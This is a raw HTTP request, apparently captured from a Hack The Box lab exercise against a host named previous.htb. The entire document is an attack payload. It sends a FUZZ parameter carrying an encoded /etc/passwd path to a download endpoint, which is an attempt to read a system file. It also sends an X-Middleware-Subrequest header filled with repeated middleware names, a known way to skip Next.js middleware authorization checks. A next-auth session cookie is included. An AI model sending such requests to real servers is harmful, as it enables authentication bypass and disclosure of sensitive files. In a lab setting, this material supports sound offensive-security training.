GET /api/download?FUZZ=%2fetc%2fpasswd HTTP/1.1
Host: previous.htb
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
Cookie: next-auth.csrf-token=6ae58ad71ddd07d658a0ba5bee866b16a0948d01438bf0fffb1d43131ef98132%7C140cb45b6f5e01ca10c502753cc09e4c40e752019a21cb2870004cb8548fbd3e; next-auth.callback-url=http%3A%2F%2Flocalhost%3A3000%2Fdocs%2Fexamples%3Fsection%3Dexamples
Connection: keep-alive

